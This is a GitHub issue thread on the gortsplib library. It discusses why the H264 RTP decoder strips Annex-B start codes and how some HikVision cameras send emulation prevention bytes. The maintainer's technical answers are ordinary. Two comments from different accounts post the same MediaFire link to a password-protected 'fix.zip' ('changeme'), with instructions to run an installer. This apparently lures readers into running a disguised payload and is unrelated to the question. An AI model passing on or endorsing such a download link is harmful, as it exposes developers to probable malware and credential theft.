### ISSUE TITLE
Motivation to automatically remove annex-b?

### ISSUE THREAD

**Issue by bmharper** [bluenviron/gortsplib#608]
Here's a reference to the code I'm referring to:

https://github.com/bluenviron/gortsplib/blob/a99cc55082b05bf50ddd7a2c68b0ba070b9764b5/pkg/format/rtph264/decoder.go#L233

I have two questions:
1. Firstly, on line 233, why `bytes.Contains(nalu, []byte{0x00, 0x00, 0x00, 0x01})` instead of `bytes.HasPrefix`? The `Contains` call will need to scan through the entire packet, which has a cost.
2. What is the motivation for removing annex-b encoding, and on which cameras have you seen this?

Thanks!

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bmharper** [comment]
I've got some more information which will help explain why I've asked this question:

I have 3 HikVision cameras, and they have confused me for a long time, but I finally figured it out:

These cameras send RTSP packets without start codes (i.e. there is no 00.00.01 or 00.00.00.01 prefix to the packets). BUT, the packets are "Annex-B" encoded, because they have "emulation prevention bytes" added. In other words, in the byte stream I find a lot of 00.00.03.01 sequences. I have verified this by trying all permutations of decoding/encoding, etc, and testing it out on ffmpeg.

So what I am saying, is that it seems clear from this example that the presence of start codes is not 1:1 correlated with Annex-B escaping. And because of this, I'm not sure that it is a good idea to automatically remove the Annex-B encoding if you detect start codes.

**Comment by aler9** [comment]
Hello,

>  What is the motivation for removing annex-b encoding, and on which cameras have you seen this?

First of all, the aim of the RTP decoder is to convert RTP packets into plain H264 access units, without Annex-B and without AVCC. These access units can then be processed or analyzed or re-muxed into anything you want.

Now, there are some strange cameras that are using Annex-B inside RTP packets, even if that is completely redundant. This prevents the correct processing of AUs. Someone reported this situation and consequently we took action. If you want the exact camera names, you can use the "blame" feature of GitHub in order to find out when the corresponding lines of code were introduced and why.

> Firstly, on line 233, why bytes.Contains(nalu, []byte{0x00, 0x00, 0x00, 0x01}) instead of bytes.HasPrefix? The Contains call will need to scan through the entire packet, which has a cost.

We discovered that some cameras send packets without the first Annex-B prefix but nonetheless they still concatenate NALUs by using Annex-B separators, preventing the splitting of NALUs. Therefore, `Contains` instead of `HasPrefix`.

> These cameras send RTSP packets without start codes (i.e. there is no 00.00.01 or 00.00.00.01 prefix to the packets). BUT, the packets are "Annex-B" encoded, because they have "emulation prevention bytes" added

Emulation prevention bytes are added regardless of the fact that Annex-B or AVCC is in use or not. Their aim is indeed to make Annex-B work, but they are mandatory anyway, and they are removed exclusively when a NALU is decoded, not when a NALU is remuxed. Therefore, a NALU with emulation prevention bytes is perfectly normal.

**Comment by bmharper** [comment]
Thanks for the detailed explanation!
